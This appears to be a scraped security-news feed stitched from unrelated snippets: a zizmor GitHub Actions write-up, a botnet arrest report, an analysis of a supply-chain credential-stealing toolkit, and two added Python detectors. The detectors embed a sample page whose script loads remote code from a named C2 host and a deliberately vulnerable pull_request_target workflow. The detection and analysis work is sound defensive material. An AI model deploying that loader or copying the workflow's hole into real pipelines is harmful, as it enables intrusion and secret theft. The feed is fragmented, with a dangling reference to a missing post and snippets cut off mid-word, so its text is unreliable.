Original post and more discovered compromised URLs: [https://x.com/rifteyy/status/2057842147630411877](https://x.com/rifteyy/status/2057842147630411877)
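The reversed-string trick in the post above is easy to undo and easy to hunt for: a literal that is nonsense forwards but a hostname backwards is a strong signal on its own. The following Python is an added example, not code from the post or from the compromised pages. The `SAMPLE_HTML` page is constructed for the example (it is not the Harvard page source) and only reproduces the technique the post describes; the TLD list in `URL_LIKE_RE` is an assumption kept deliberately short.

```python
import re

# Constructed sample page for this example. It is NOT the Harvard page source;
# it only reproduces the technique the post describes: the loader keeps its C2
# host as a reversed string and un-reverses it at runtime before injecting a
# <script> tag that points at it.
SAMPLE_HTML = """
<html><head><title>Article</title></head><body>
<p>Legitimate article text.</p>
<script>
  var z = "sj.ssc/ipa/orp.eralfduolccitats".split("").reverse().join("");
  var s = document.createElement("script");
  s.src = "https://" + z;
  document.head.appendChild(s);
</script>
<script>
  var analytics = "example.org/stats.js";
</script>
</body></html>
"""

SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.S | re.I)
# A quoted literal of 8+ characters that follows '=', '(', ',' or whitespace.
# The lookbehind keeps the empty "" arguments of split()/join() from pairing
# with the wrong quote; a real scanner would tokenize the JavaScript instead.
STRING_RE = re.compile(r"""(?<=[=(,\s])(["'])([^"'\n]{8,})\1""")
# Hostname plus optional path. The TLD list is an assumption and deliberately
# short; use a public-suffix list for production use.
URL_LIKE_RE = re.compile(
    r"^[a-z0-9.-]+\.(pro|com|net|org|io|xyz|top|site)(/[\w./-]*)?$", re.I
)


def decode_reversed(s: str) -> str:
    """Undo the split("").reverse().join("") trick used by the loader."""
    return s[::-1]


def find_reversed_urls(html: str) -> list[dict]:
    """Return script string literals that look like a URL only once reversed."""
    hits = []
    for script in SCRIPT_RE.findall(html):
        for m in STRING_RE.finditer(script):
            lit = m.group(2)
            if URL_LIKE_RE.match(lit):
                continue  # a plain URL-like literal is not obfuscated
            decoded = decode_reversed(lit)
            if URL_LIKE_RE.match(decoded):
                hits.append({
                    "literal": lit,
                    "decoded": decoded,
                    # Corroborating signal: the same script reverses a string at runtime.
                    "reverses_at_runtime": ".reverse()" in script,
                })
    return hits


def defang(indicator: str) -> str:
    """Render a host/path indicator so it cannot be clicked in a report."""
    host, sep, path = indicator.partition("/")
    return host.replace(".", "[.]") + sep + path


if __name__ == "__main__":
    for hit in find_reversed_urls(SAMPLE_HTML):
        print(f"reversed C2 literal {hit['literal']!r} -> {defang(hit['decoded'])}")
```

Run against the sample page it reports exactly one hit, the reversed literal from the post decoded to `staticcloudflare[.]pro/api/css.js`, while the ordinary analytics URL in the second script is ignored. The `reverses_at_runtime` flag is there so a triage rule can require both the reversed literal and a runtime `.reverse()` call before alerting.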
In March 2026, attackers exploited a pull_request_target misconfiguration in the aquasecurity/trivy-action GitHub Action to exfiltrate organization and repository secrets, then used those credentials to backdoor LiteLLM on PyPI (see Trivy’s post-mortem for the full timeline). zizmor is a static analyzer that GitHub Actions users run to catch exactly these misconfigurations before they ship. When GitHub Actions added support for YAML anchors in September 2025, a small but high-value slice of the ecosystem started writing workflows that zizmor could only analyze on a best-effort basis. Over the past three months, Trail of Bits collaborated with the zizmor maintainers to bring zizmor ’s anchor support up to full coverage. First, we fixed parsing bugs that caused crashes, produced wrong-location findings, and silently mishandled aliased values. Second, we surfaced deserialization edge cases that broke zizmor on otherwise valid workflows. Finally, we helped align zizmor ’s expression evaluator with GitHub’s own Known Answer Tests . We validated all of this against a new corpus of 41,253 workflows from 6,612 high-value open-source repositories. The result: 20 filed issues, 15 merged pull requests. Building the test corpus To u
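The `pull_request_target` misconfiguration referenced above has a recognisable shape: a trigger that runs with the base repository's secrets, a checkout of the pull request's head, and a step that then executes code from that checkout. The Python below is an added example showing a minimal line-based check for that chain; it is not zizmor's code and is far less thorough than zizmor's audits (no YAML parser, single `steps:` list only). The three workflows are constructed for the example and are not trivy-action's real workflow.

```python
import re

# Constructed workflows for this example (not trivy-action's real workflow).
# VULNERABLE_WORKFLOW shows the pattern: pull_request_target runs with the base
# repository's secrets, and the job then checks out and executes the untrusted
# pull-request head, so a fork PR can run arbitrary code with those secrets.
VULNERABLE_WORKFLOW = """\
name: scan
on:
  pull_request_target:
    types: [opened, synchronize]
jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - run: make test
        env:
          TOKEN: ${{ secrets.PUBLISH_TOKEN }}
"""

# Same trigger, but the job only checks out the base branch, so nothing from
# the PR executes in the privileged context.
BASE_ONLY_WORKFLOW = """\
name: label
on:
  pull_request_target:
jobs:
  label:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: ./scripts/label-pr.sh
"""

# Plain pull_request: fork PRs get a read-only token and no repository secrets.
HARDENED_WORKFLOW = """\
name: scan
on:
  pull_request:
    types: [opened, synchronize]
jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: make test
"""

TRIGGER_RE = re.compile(r"^\s*pull_request_target\s*:", re.M)
CHECKOUT_RE = re.compile(r"uses:\s*actions/checkout@")
HEAD_REF_RE = re.compile(r"github\.event\.pull_request\.head\.(sha|ref)")
RUN_RE = re.compile(r"^\s*-?\s*run:", re.M)


def split_steps(text: str) -> list[str]:
    """Split the first `steps:` list into one string per `- ` item (line-based, demo only)."""
    steps, current, in_steps, indent = [], [], False, None
    for line in text.splitlines():
        if re.match(r"^\s*steps:\s*$", line):
            in_steps = True
            continue
        if not in_steps:
            continue
        m = re.match(r"^(\s*)- ", line)
        if m and (indent is None or len(m.group(1)) == indent):
            indent = len(m.group(1))
            if current:
                steps.append("\n".join(current))
            current = [line]
        elif current:
            current.append(line)
    if current:
        steps.append("\n".join(current))
    return steps


def audit_workflow(text: str) -> list[str]:
    """Flag the pull_request_target + untrusted-checkout + execute chain."""
    findings = []
    if not TRIGGER_RE.search(text):
        return findings
    findings.append("pull_request_target: job runs with base-repo secrets")
    untrusted_checkout = False
    for step in split_steps(text):
        if CHECKOUT_RE.search(step) and HEAD_REF_RE.search(step):
            untrusted_checkout = True
            findings.append("checks out the PR head (untrusted code) in the privileged job")
        elif untrusted_checkout and RUN_RE.search(step):
            findings.append("runs a command after the untrusted checkout")
    return findings


if __name__ == "__main__":
    for name, wf in [("vulnerable", VULNERABLE_WORKFLOW),
                     ("base-only", BASE_ONLY_WORKFLOW),
                     ("hardened", HARDENED_WORKFLOW)]:
        print(name, audit_workflow(wf) or ["no findings"])
```

The base-only workflow still gets the informational trigger finding, which is the right call: `pull_request_target` is not wrong by itself, it becomes exploitable only once the job checks out and runs the contributor's code. Note also that a `uses: ./some-local-action` step after the untrusted checkout is just as dangerous as `run:` and is not covered by this toy check.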
GreyNoise compared 119,842 malicious IPs against 11 major threat feeds. The average coverage: just 2%, exposing the limits of static blocklists.
Canadian authorities on Wednesday arrested a 23-year-old Ottawa man on suspicion of building and operating Kimwolf , a fast spreading Internet-of-Things botnet that enslaved millions of devices for use in a series of massive distributed denial-of-service (DDoS) attacks over the past six months. KrebsOnSecurity publicly named the suspect in February 2026 after the accused launched a volley of DDoS, doxing and swatting campaigns against this author and a security researcher. He now faces criminal hacking charges in both Canada and the United States. A criminal complaint unsealed today in an Alaska district court charges Jacob Butler , a.k.a. “ Dort ,” of Ottawa, Canada with operating the Kimwolf DDoS botnet. A statement from the Department of Justice says the complaint against Butler was unsealed following the defendant’s arrest in Canada by the Ontario Provincial Police pursuant to a U.S. extradition warrant. Butler is currently in Canadian custody awaiting an initial court hearing scheduled for early next week. The government said Kimwolf targeted infected devices which were traditionally “firewalled” from the rest of the internet, such as digital photo frames and web cameras. The infected systems were then rented to other cybercriminals, or forced to participate in record-smashing DDoS attacks, as well as assaults that affected Internet address ranges for the Department of Defense . Consequently, the DoD’s Defense Criminal Investigative Service is investigating the case, with assistance from the FBI field office in Anchorage. “KimWolf was tied to DDoS attacks which were measured at nearly 30 Terabits per second, a record in recorded DDoS attack volume,R
Three firms will pay nearly $1 million for selling “Active Listening” technology that they claimed tapped people’s phones for advertising. The FTC alleges the “tech” was just pricey email lists.
How TeamPCP's Python Toolkit Survives a C2 Takedown: FIRESCALE, GitHub, and the Victim's Own Account
Researchers tore apart the second-stage Python toolkit used in the Mini Shai-Hulud supply chain campaign. The delivery via trojanized npm/PyPI packages got coverage elsewhere. This goes deeper into what actually runs on the machine after. 13 modules, parallel execution, 90+ credential targets. Here's what stood out: * FIRESCALE is a dead-drop resolver that queries GitHub's commit search API globally looking for a signed backup C2 address. The RSA public key is embedded in the malware. No attacker repo to take down, the redirect can come from any account * When both C2 paths fail, the malware creates a public repo under the victim's own GitHub account and commits the credential harvest there. Operator retrieves it via public API, no auth required * The AWS module covers all 19 regions including both GovCloud partitions, restricted to US government and defense contractors * Kubernetes certs loaded entirely in kernel memory via memfd\_create. Nothing hits disk * Geopolitical wiper targets Israeli/Iranian systems with a 1-in-6 probability gate, specifically designed to evade single-run sandbox analysis
Hello all, The past few months I really got into Malicious Browser Extensions. During the creation of my project I started an automation that collects malicious browser extensions. During my thesis as a student I struggled to find CRX files.. so I created my own database of them. Here is the github for it: [https://github.com/GherardoFiori/MaliciousBrowserExtensions](https://github.com/GherardoFiori/MaliciousBrowserExtensions) Here is more info about the automation behind it: [https://buio.me/n8n](https://buio.me/n8n) I hope this can help someone with their own research around this subject. Since I really struggled to get my hands on crx files when it came to "malware" or "malicious"
I just wrapped a 99‑fixture adversarial PE corpus for IOCX — deterministic, spec‑aware, malformed‑but‑parseable binaries, each isolating a single structural anomaly. The whole thing is only 250 KB and it already helped tighten up an unreleased validator. IOCX now walks even the most pathological PEs with confidence. Honestly, this is the most fun I’ve had with PE internals in years. Happy to share details if anyone’s curious. Github: [https://github.com/iocx-dev/iocx](https://github.com/iocx-dev/iocx)
France is already moving on from Zoom and Microsoft Teams in favor of homegrown alternatives. Other countries are quickly following suit.
A look at how Kubernetes CVE-2021-25740 allows users with EndpointSlice access to redirect traffic via shared ingress and load balancer services.
A new SonicWall scanning surge mirrors the pattern that preceded CVE-2026-0400. GreyNoise details the activity and what defenders should watch.
Attorney John Scola is representing a police officer who is suing over injuries allegedly sustained while working security at an MSG property in 2025.